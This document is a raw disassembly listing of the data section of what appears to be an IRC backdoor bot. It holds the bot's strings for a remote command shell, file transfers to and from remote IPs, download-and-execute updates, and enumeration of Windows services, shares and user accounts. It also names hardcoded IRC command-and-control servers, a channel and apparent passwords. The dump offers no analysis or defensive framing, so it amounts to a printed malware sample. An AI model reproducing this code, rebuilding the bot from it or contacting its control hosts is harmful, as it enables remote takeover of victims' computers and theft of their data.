dword_42DE50 dd 20746F4Eh, 6E6E6F63h, 65746365h, 64h ; DATA XREF: sub_40BB8C+48�o
unk_42DE60 db 2 ; DATA XREF: sub_40BC4B:loc_40BE04�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 76h, 69h, 73h
db 69h ; i
db 74h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToConnec db 'Failed to connect to HTTP server.',0
align 10h
unk_42DEA0 db 2 ; DATA XREF: sub_40BC4B:loc_40BDFD�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 76h, 69h, 73h
db 69h ; i
db 74h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aCouldNotOpenAC db 'Could not open a connection.',0
align 4
dword_42DEDC dd 7A026E02h, 201F6D1Fh, 73697628h, 702E7469h, 671F6C1Fh
; DATA XREF: sub_40BC4B+1A0�o
dd 0BB022029h, 202002BBh, 61766E49h, 2064696Ch, 2E4C5255h
dd 0
unk_42DF08 db 2 ; DATA XREF: sub_40BC4B:loc_40BDDE�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 76h, 69h, 73h
db 69h ; i
db 74h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToGetReq db 'Failed to get requested URL from HTTP server.',0
align 4
dword_42DF54 dd 7A026E02h, 201F6D1Fh, 73697628h, 702E7469h, 671F6C1Fh
; DATA XREF: sub_40BC4B+18C�o
dd 0BB022029h, 202002BBh, 204C5255h, 69736976h, 2E646574h
dd 0
dword_42DF80 dd 2A2F2Ah ; DATA XREF: sub_40BC4B+3B�o
dword_42DF84 dd 202E6425h, 3D207325h, 732520h ; DATA XREF: sub_40BEF5+35�o
dword_42DF90 dd 6C415B2Dh, 20736169h, 7473694Ch, 2D5Dh ; DATA XREF: sub_40BEF5+10�o
a_2d_2d4d_2d_2d db '[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s',0 ; DATA XREF: sub_40BF6D+60�o
align 4
dword_42DFC4 dd 7A026E02h, 201F6D1Fh, 676F6C28h, 1F702E73h, 29671F6Ch
; DATA XREF: sub_40C00D+1A�o
dd 0BBBB0220h, 20202002h, 61656C43h, 2E646572h, 0
dword_42DFEC dd 7A026E02h, 201F6D1Fh, 676F6C28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C07F+DC�o
dd 2BBBB02h, 694C2020h, 63207473h, 6C706D6Fh, 2E657465h
dd 0
dword_42E018 dd 7A026E02h, 201F6D1Fh, 676F6C28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C07F+3F�o
dd 2BBBB02h, 65422020h, 6E6967h
dword_42E038 dd 80000002h, 42F6D0h, 80000002h, 42F700h, 80000001h, 42F738h
; DATA XREF: sub_40C1AE+7�o
dword_42E050 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C1AE+63�o
; sub_40C351+170�o
dd 2BBBB02h
aFailedToSendTo db ' Failed to send to Remote command shell.',0
align 4
dword_42E094 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C351+AB�o
dd 2BBBB02h
aFailedToOpenRe db ' Failed to open remote command shell.',0
align 4
dword_42E0D4 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C351+47�o
; sub_40C512+FD�o
dd 2BBBB02h
aFailedToOpenSo db ' Failed to open socket.',0
align 4
dword_42E108 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C512+362�o
; sub_40C8B4+156�o
dd 2BBBB02h, 6F532020h, 74656B63h, 72726520h, 2E726Fh
dword_42E130 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C512+2FA�o
dd 2BBBB02h
aTransferComp_0 db ' Transfer complete to IP: %s, Filename: %s (%s bytes).',0
dword_42E180 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C512+202�o
dd 2BBBB02h
aUnableToOpenSo db ' Unable to open socket.',0
align 4
dword_42E1B4 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C512+1CB�o
dd 2BBBB02h, 65532020h, 7420646Eh, 6F656D69h, 2E7475h
dword_42E1DC dd 43434401h, 4E455320h, 73252044h, 20692520h, 25206925h
; DATA XREF: sub_40C512+16A�o
dd 169h
dword_42E1F4 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C512+127�o
dd 2BBBB02h
aFileDoesnTExis db ' File doesn',27h,'t exist.',0
align 4
dword_42E224 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C512+82�o
dd 2BBBB02h
aFailedToBindTo db ' Failed to bind to socket.',0
dword_42E258 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C512+44�o
dd 2BBBB02h
aFailedToCreate db ' Failed to create socket.',0
align 4
dword_42E28C dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C8B4+1D1�o
dd 2BBBB02h
aTransferComp_1 db ' Transfer complete from IP: %s, Filename: %s (%s bytes).',0
align 10h
dword_42E2E0 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C8B4+CB�o
dd 2BBBB02h
aErrorOpeningSo db ' Error opening socket.',0
dword_42E310 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C8B4+AB�o
dd 2BBBB02h
aErrorOpeningFi db ' Error opening file for writing.',0
align 4
aAB db 'a+b',0 ; DATA XREF: sub_40C8B4+97�o
dword_42E350 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C8B4+83�o
dd 2BBBB02h
aErrorUnableToW db ' Error unable to write file to disk.',0
align 10h
unk_42E390 db 2 ; DATA XREF: sub_40CAF1+493�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aBadUrlOrDnsErr db ' Bad URL, or DNS Error: %s.',0
align 4
unk_42E3CC db 2 ; DATA XREF: sub_40CAF1+485�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aUpdateFailedEr db ' Update failed: Error executing file: %s.',0
unk_42E414 db 2 ; DATA XREF: sub_40CAF1+3C9�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDownloaded_1fk db ' Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.',0
align 4
dword_42E464 dd 7A026E02h, 201F6D1Fh, 776F6428h, 616F6C6Eh, 1F702E64h
; DATA XREF: sub_40CAF1+358�o
dd 29671F6Ch, 0BBBB0220h, 4F202002h, 656E6570h, 25203A64h
dd 2E73h
aOpen db 'open',0 ; DATA XREF: sub_40CAF1+336�o
; sub_40EE72+2B48�o ...
align 4
unk_42E498 db 2 ; DATA XREF: sub_40CAF1+2E1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDownloaded_1fK db ' Downloaded %.1f KB to %s @ %.1f KB/sec.',0
align 10h
unk_42E4E0 db 2 ; DATA XREF: sub_40CAF1+262�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aCrcFailedDD_ db ' CRC Failed (%d != %d).',0
align 4
unk_42E518 db 2 ; DATA XREF: sub_40CAF1+1D8�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFilesizeIsInco db ' Filesize is incorrect: (%d != %d).',0
align 4
unk_42E55C db 2 ; DATA XREF: sub_40CAF1+195�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aUpdateSDkbTran db ' Update: %s (%dKB transferred).',0
align 4
unk_42E59C db 2 ; DATA XREF: sub_40CAF1+183�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFileDownloadSD db ' File download: %s (%dKB transferred).',0
align 4
unk_42E5E4 db 2 ; DATA XREF: sub_40CAF1+77�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aCouldnTOpenFil db ' Couldn',27h,'t open file: %s.',0
align 4
aUnknown_0 db 'Unknown',0 ; DATA XREF: sub_40D099:loc_40D0DC�o
; sub_40DF4E+10A�o
aInvalid db 'Invalid',0 ; DATA XREF: sub_40D099:loc_40D0D6�o
aDisk db 'Disk',0 ; DATA XREF: sub_40D099:loc_40D0D0�o
align 4
aNetwork db 'Network',0 ; DATA XREF: sub_40D099:loc_40D0CA�o
aCdrom db 'Cdrom',0 ; DATA XREF: sub_40D099:loc_40D0C4�o
align 4
aRam db 'RAM',0 ; DATA XREF: sub_40D099:loc_40D0BE�o
aFailed db 'failed',0 ; DATA XREF: sub_40D12A:loc_40D208�o
; sub_40D24E+3B�o
align 10h
aSkb db '%sKB',0 ; DATA XREF: sub_40D12A+6C�o
align 4
unk_42E658 db 2 ; DATA XREF: sub_40D24E+8E�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 63h, 6Fh, 72h
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSDriveSSTotalS db ' %s Drive (%s): %s total, %s free, %s available.',0
align 4
unk_42E6A4 db 2 ; DATA XREF: sub_40D24E+58�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 63h, 6Fh, 72h
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSDriveSFailedT db ' %s Drive (%s): Failed to stat, device not ready.',0
aA_0 db 'A:\',0 ; DATA XREF: sub_40D320:loc_40D365�o
dword_42E6F4 dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0 ; DATA XREF: sub_40D4C5+A4�o
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_42E740 dd 3000005h, 10h, 18h, 1, 3 dup(0) ; DATA XREF: sub_40D4C5+E3�o
; ---------------------------------------------------------------------------
loc_42E75C: ; DATA XREF: sub_40D4C5+118�o
mov al, 1
push edx
xchg eax, edi
retf 0D059h
; ---------------------------------------------------------------------------
db 11h
dd 0A000D5A8h, 51800DC9h, 0
dword_42E770 dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
; DATA XREF: sub_40D4C5+13F�o
dword_42E784 dd 25207325h, 253A2073h, 0A0D73h ; DATA XREF: sub_40D679+5D�o
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_40D679+16�o
; sub_40EE72+623�o
aNotice db 'NOTICE',0 ; DATA XREF: sub_40D679+F�o
; sub_40EE72+62F�o
align 10h
off_42E7A0 dd offset aAdd ; DATA XREF: sub_40D719+60�r
; sub_40DAF0+51�r ...
; "Add"
off_42E7A4 dd offset aAdded ; DATA XREF: sub_40D719+2D�r
; sub_40DAF0+83�r ...
; "Added"
dword_42E7A8 dd 0 ; DATA XREF: sub_40D719+18�r
dd offset aDelete_0 ; "Delete"
dd offset aDeleted ; "Deleted"
align 8
dd offset aList_0 ; "List"
dd offset aListed ; "Listed"
dd 0
dd offset aStart_0 ; "Start"
dd offset aStarted ; "Started"
align 10h
dd offset aStop_0 ; "Stop"
dd offset aStopped_0 ; "Stopped"
dd 1, 42E814h, 42E80Ch, 2, 42E800h, 42E7F4h, 3, 746E6F43h
dd 65756E69h, 64h, 746E6F43h, 65756E69h, 0
aPaused db 'Paused',0
align 4
aPause_0 db 'Pause',0
align 4
aStopped_0 db 'Stopped',0 ; DATA XREF: _2:0042E7D4�o
aStop_0 db 'Stop',0 ; DATA XREF: _2:0042E7D0�o
align 4
aStarted db 'Started',0 ; DATA XREF: _2:0042E7C8�o
aStart_0 db 'Start',0 ; DATA XREF: _2:0042E7C4�o
align 4
aListed db 'Listed',0 ; DATA XREF: _2:0042E7BC�o
align 4
aList_0 db 'List',0 ; DATA XREF: _2:0042E7B8�o
align 4
aDeleted db 'Deleted',0 ; DATA XREF: _2:0042E7B0�o
aDelete_0 db 'Delete',0 ; DATA XREF: _2:0042E7AC�o
align 4
aAdded db 'Added',0 ; DATA XREF: _2:off_42E7A4�o
align 4
aAdd db 'Add',0 ; DATA XREF: _2:off_42E7A0�o
dword_42E868 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D719+67�o
dd 2BBBB02h
aSNoServiceSpec db ' %s: No service specified.',0
dword_42E89C dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D719+51�o
dd 2BBBB02h
aErrorWithServi db ' Error with service: ',27h,'%s',27h,'. %s',0
align 4
dword_42E8D4 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D719+33�o
dd 2BBBB02h
aSServiceS_ db ' %s service: ',27h,'%s',27h,'.',0
aAnUnknownErr_0 db 'An unknown error occurred: <%ld>',0 ; DATA XREF: sub_40D835+12C�o
align 4
aTheSystemIsShu db 'The system is shutting down.',0 ; DATA XREF: sub_40D835:loc_40D94D�o
align 4
aTheServiceHasN db 'The service has not been started.',0 ; DATA XREF: sub_40D835:loc_40D946�o
align 4
aTheRequested_1 db 'The requested control code cannot be sent to the service because '
; DATA XREF: sub_40D835:loc_40D93F�o
db 'the state of the service.',0
align 4
aTheServiceHa_0 db 'The service has been marked for deletion.',0
; DATA XREF: sub_40D835:loc_40D938�o
align 10h
aTheServiceCoul db 'The service could not be logged on. The account does not have the'
; DATA XREF: sub_40D835:loc_40D931�o
db ' correct access rights.',0
align 4
aTheSpecified_0 db 'The specified service does not exist.',0
; DATA XREF: sub_40D835:loc_40D92A�o
align 4
aTheServiceHasB db 'The service has been disabled.',0 ; DATA XREF: sub_40D835:loc_40D923�o
align 4
aTheServiceDe_0 db 'The service depends on another service that has failed to start.',0
; DATA XREF: sub_40D835:loc_40D91C�o
align 4
aTheServiceDepe db 'The service depends on a service that does not exist or has been '
; DATA XREF: sub_40D835:loc_40D915�o
db 'marked for deletion.',0
align 10h
aTheSpecifiedDa db 'The specified database does not exist.',0
; DATA XREF: sub_40D835:loc_40D90E�o
align 4
aAnInstanceOfTh db 'An instance of the service is already running.',0
; DATA XREF: sub_40D835:loc_40D8E3�o
align 4
aTheRequested_0 db 'The requested control code is not valid, or it is unacceptable to'
; DATA XREF: sub_40D835:loc_40D8DC�o
db ' the service.',0
align 4
aTheProcessForT db 'The process for the service was started, but it did not call Star'
; DATA XREF: sub_40D835:loc_40D8D5�o
db 'tServiceCtrlDispatcher.',0
align 4
aAThreadCouldNo db 'A thread could not be created for the service.',0
; DATA XREF: sub_40D835:loc_40D8CE�o
align 4
aTheDatabaseIsL db 'The database is locked.',0 ; DATA XREF: sub_40D835+8F�o
aTheServiceCann db 'The service cannot be stopped because other running services are '
; DATA XREF: sub_40D835:loc_40D8A3�o
db 'dependent on it.',0
align 10h
aTheServiceBina db 'The service binary file could not be found.',0
; DATA XREF: sub_40D835:loc_40D899�o
aTheHandleDoesN db 'The handle does not have the required access right.',0
; DATA XREF: sub_40D835:loc_40D88F�o
aTheHandleIsInv db 'The handle is invalid.',0 ; DATA XREF: sub_40D835:loc_40D885�o
align 4
aTheRequestedCo db 'The requested control code is undefined.',0
; DATA XREF: sub_40D835:loc_40D87B�o
align 4
aTheSpecifiedSe db 'The specified service name is invalid.',0 ; DATA XREF: sub_40D835+3C�o
align 4
aSSS db '%s: %s (%s)',0 ; DATA XREF: sub_40D9B3+EB�o
aStopped db ' Stopped',0 ; DATA XREF: sub_40D9B3:loc_40DA7F�o
aStarting db ' Starting',0 ; DATA XREF: sub_40D9B3:loc_40DA78�o
aStoping db ' Stoping',0 ; DATA XREF: sub_40D9B3:loc_40DA71�o
aRunning db ' Running',0 ; DATA XREF: sub_40D9B3:loc_40DA6A�o
aContinuing db ' Continuing',0 ; DATA XREF: sub_40D9B3:loc_40DA63�o
aPausing db ' Pausing',0 ; DATA XREF: sub_40D9B3:loc_40DA5C�o
aPaused_0 db ' Paused',0 ; DATA XREF: sub_40D9B3:loc_40DA55�o
aUnknown_1 db ' Unknown',0 ; DATA XREF: sub_40D9B3+9B�o
aTheFollowingWi db 'The following Windows services are registered:',0
; DATA XREF: sub_40D9B3+25�o
align 4
dword_42EE38 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40DAF0+AC�o
dd 2BBBB02h
aSNoShareSpecif db ' %s: No share specified.',0
align 4
dword_42EE6C dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40DAF0+8A�o
dd 2BBBB02h
aSShareS_ db ' %s share: ',27h,'%s',27h,'.',0
align 4
dword_42EE98 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40DAF0+58�o
dd 2BBBB02h
aSErrorWithShar db ' %s: Error with share: ',27h,'%s',27h,'. %s',0
align 4
a14s24s6u4s db '%-14S %-24S %-6u %-4s',0 ; DATA XREF: sub_40DCE6+D0�o
align 4
aNo db 'No',0 ; DATA XREF: sub_40DCE6+BC�o
align 10h
aYes db 'Yes',0 ; DATA XREF: sub_40DCE6+B5�o
dword_42EEF4 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40DCE6+76�o
dd 2BBBB02h
aShareListError db ' Share list error: %s <%ld>',0
align 4
aShareNameResou db 'Share name: Resource: Uses: Desc:',0
; DATA XREF: sub_40DCE6+26�o
align 4
dword_42EF64 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40DE07+B7�o
dd 2BBBB02h
aSNoUsernameSpe db ' %s: No username specified.',0
align 4
dword_42EF9C dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40DE07+95�o
dd 2BBBB02h
aSErrorWithUser db ' %s: Error with username: ',27h,'%s',27h,'. %s',0
dword_42EFD8 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40DE07+6D�o
dd 2BBBB02h
aSUsernameS_ db ' %s username: ',27h,'%s',27h,'.',0
align 4
dword_42F008 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40DF4E+3AF�o
dd 2BBBB02h
aUserInfoErrorL db ' User info error: <%ld>',0
align 4
aUnitsPerWeekD db 'Units Per Week: %d',0 ; DATA XREF: sub_40DF4E+385�o
align 10h
aMax_StorageD db 'Max. Storage: %d',0 ; DATA XREF: sub_40DF4E+35A�o
align 4
aUserSLanguageD db 'User',27h,'s Language: %d',0 ; DATA XREF: sub_40DF4E+32F�o
aCountryCodeD db 'Country Code: %d',0 ; DATA XREF: sub_40DF4E+304�o
align 4
aWorkstationsS db 'Workstations: %S',0 ; DATA XREF: sub_40DF4E+2D9�o
align 10h
aLogonServerS db 'Logon Server: %S',0 ; DATA XREF: sub_40DF4E+2AE�o
align 4
aLastLogoffD db 'Last Logoff: %d',0 ; DATA XREF: sub_40DF4E+283�o
aLastLogonD db 'Last Logon: %d',0 ; DATA XREF: sub_40DF4E+258�o
align 4
aNumberOfLogins db 'Number of Logins: %d',0 ; DATA XREF: sub_40DF4E+22D�o
align 4
aBadPasswordCou db 'Bad Password Count: %d',0 ; DATA XREF: sub_40DF4E+202�o
align 4
aPasswordAgeD db 'Password Age: %d',0 ; DATA XREF: sub_40DF4E+1D7�o
align 4
aParametersS db 'Parameters: %S',0 ; DATA XREF: sub_40DF4E+1AC�o
align 4
aHomeDirectoryS db 'Home Directory: %S',0 ; DATA XREF: sub_40DF4E+181�o
align 4
aAuthFlagsD db 'Auth Flags: %d',0 ; DATA XREF: sub_40DF4E+156�o
align 4
aPrivilegeLevel db 'Privilege Level: %s',0 ; DATA XREF: sub_40DF4E+12B�o
aGuest db 'Guest',0 ; DATA XREF: sub_40DF4E:loc_40E06D�o
align 4
aUser_1 db 'User',0 ; DATA XREF: sub_40DF4E:loc_40E066�o
align 10h
aAdministrator db 'Administrator',0 ; DATA XREF: sub_40DF4E:loc_40E05F�o
; _2:0042F778�o ...
align 10h
aCommentS db 'Comment: %S',0 ; DATA XREF: sub_40DF4E+DA�o
aUserCommentS db 'User Comment: %S',0 ; DATA XREF: sub_40DF4E+AF�o
align 10h
aFullNameS db 'Full Name: %S',0 ; DATA XREF: sub_40DF4E+84�o
align 10h
aAccountS db 'Account: %S',0 ; DATA XREF: sub_40DF4E+50�o
aTotalUsersFoun db 'Total users found: %d.',0 ; DATA XREF: sub_40E337+14F�o
align 4
dword_42F1D4 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40E337+F7�o
dd 2BBBB02h
aAnAccessViolat db ' An access violation has occured.',0
align 10h
aS_6 db ' %S',0 ; DATA XREF: sub_40E337+BE�o
align 4
dword_42F218 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40E337+7A�o
dd 2BBBB02h
aUserListErrorS db ' User list error: %s <%ld>',0
aUsernameAccoun db 'Username accounts for local system:',0 ; DATA XREF: sub_40E337+29�o
aNetworkConnect db 'Network connection not found.',0 ; DATA XREF: sub_40E4B7:loc_40E5D4�o
align 10h
aTheUserNameCou db 'The user name could not be found.',0 ; DATA XREF: sub_40E4B7:loc_40E5CD�o
align 4
aShareNotFound_ db 'Share not found.',0 ; DATA XREF: sub_40E4B7:loc_40E5C6�o
align 4
aTheComputerNam db 'The computer name is invalid.',0 ; DATA XREF: sub_40E4B7:loc_40E5BF�o
align 4
aAnUnknownError db 'An unknown error occurred.',0 ; DATA XREF: sub_40E4B7:loc_40E5B8�o
align 4
aThePasswordIsS db 'The password is shorter than required (or does not meet the passw'
; DATA XREF: sub_40E4B7:loc_40E59B�o
db 'ord policy requirement.)',0
align 10h
aTheGroupAlread db 'The group already exists.',0 ; DATA XREF: sub_40E4B7:loc_40E594�o
align 4
aTheUserAccount db 'The user account already exists.',0 ; DATA XREF: sub_40E4B7:loc_40E58D�o
align 10h
aTheOperationIs db 'The operation is allowed only on the primary domain controller of'
; DATA XREF: sub_40E4B7+CF�o
db ' the domain.',0
align 10h
aAGeneralFailur db 'A general failure occurred in the network hardware.',0
; DATA XREF: sub_40E4B7:loc_40E562�o
aLevelParameter db 'Level parameter is invalid.',0 ; DATA XREF: sub_40E4B7:loc_40E55B�o
aDeviceOrDirect db 'Device or directory does not exist.',0
; DATA XREF: sub_40E4B7:loc_40E554�o
aInvalidForRedi db 'Invalid for redirected resource.',0 ; DATA XREF: sub_40E4B7:loc_40E54A�o
align 4
aDuplicateShare db 'Duplicate share name.',0 ; DATA XREF: sub_40E4B7+89�o
align 10h
aTheNameIsInval db 'The name is invalid.',0 ; DATA XREF: sub_40E4B7:loc_40E524�o
align 4
aAccessDenied_ db 'Access denied.',0 ; DATA XREF: sub_40E4B7:loc_40E51A�o
align 4
aNotEnoughMemor db 'Not enough memory.',0 ; DATA XREF: sub_40E4B7:loc_40E510�o
align 4
aThisNetworkReq db 'This network request is not supported.',0
; DATA XREF: sub_40E4B7:loc_40E506�o
align 4
aServerNameNotF db 'Server name not found.',0 ; DATA XREF: sub_40E4B7:loc_40E4FC�o
align 4
aInvalidParamet db 'Invalid parameter.',0 ; DATA XREF: sub_40E4B7+3B�o
align 10h
dword_42F530 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40E5EB+AB�o
dd 2BBBB02h
aSServerSMessag db ' %s <Server: %S> <Message: %S>',0
dword_42F568 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40E5EB+81�o
dd 2BBBB02h
aMessageSentSuc db ' Message sent successfully.',0
align 10h
dword_42F5A0 dd 1B58h ; DATA XREF: sub_40E6A9+3A3�r
; sub_40E6A9+456�r
dword_42F5A4 dd 0C8Bh ; DATA XREF: sub_40E6A9+4A2�r
dword_42F5A8 dd 30EAh ; DATA XREF: sub_40EE72:loc_414C08�r
dword_42F5AC dd 18F4h ; DATA XREF: sub_407252+3B�r
; sub_40EE72+52E4�r
dword_42F5B0 dd 1BB0h ; DATA XREF: sub_407252:loc_407501�r
; sub_40EE72:loc_41424B�r
dword_42F5B4 dd 0A84h ; DATA XREF: sub_40EE72:loc_4143C1�r
dword_42F5B8 dd 1 ; DATA XREF: sub_40EE72+665�r
dword_42F5BC dd 1 ; DATA XREF: sub_40E6A9+13D�r
dword_42F5C0 dd 1 ; DATA XREF: sub_40AC42+C�r
; sub_40E6A9:loc_40E9D8�r
byte_42F5C4 db 2Eh ; DATA XREF: sub_40CFE3:loc_40CFEF�r
; sub_40EE72+B05�r ...
align 4
dword_42F5C8 dd 6 ; DATA XREF: sub_415994+2B�r
; sub_415994+51�r ...
dword_42F5CC dd 4 ; DATA XREF: sub_40EB92+78�r
; sub_40EE72+279�r ...
a8652 db '8652',0
align 4
aCool_0 db 'cool',0
align 10h
aMan db 'man',0
align 8
aAsn445 db 'asn445',0
align 10h
db 2 dup(0)
byte_42F5F2 db 1 ; DATA XREF: sub_40EE72:loc_413D42�r
; sub_40EE72+4EDA�o
aAsn139 db 'asn139',0
align 4
dd 100h, 3 dup(0)
aBotid db 'botid',0 ; DATA XREF: sub_40E6A9+5A�o
; sub_40EE72+3E40�o ...
align 4
aAbosal7Tool db 'ABOSAL7 tool',0 ; DATA XREF: sub_40EE72:loc_414E20�o
align 4
aCool db 'cool',0 ; DATA XREF: sub_40EE72+6127�o
; sub_40EE72+61F6�o
align 4
aSaber2_ircqfor db 'saber2.ircqforum.com',0 ; DATA XREF: sub_40E6A9+38E�o
; sub_40E6A9+447�o
align 4
aFaak db '#faak#',0 ; DATA XREF: sub_40E6A9+3AF�o
; sub_40E6A9+45D�o
align 4
aSaad_ db 'saad.',0 ; DATA XREF: sub_40E6A9+3C6�o
; sub_40E6A9+46F�o
align 4
byte_42F654 db 73h ; DATA XREF: sub_40E6A9:loc_40EB2E�r
; sub_40E6A9+493�o
aCorti1_dns2go_ db 'corti1.dns2go.com',0
align 4
aFaak_0 db '#faak#',0 ; DATA XREF: sub_40E6A9+4A9�o
align 10h
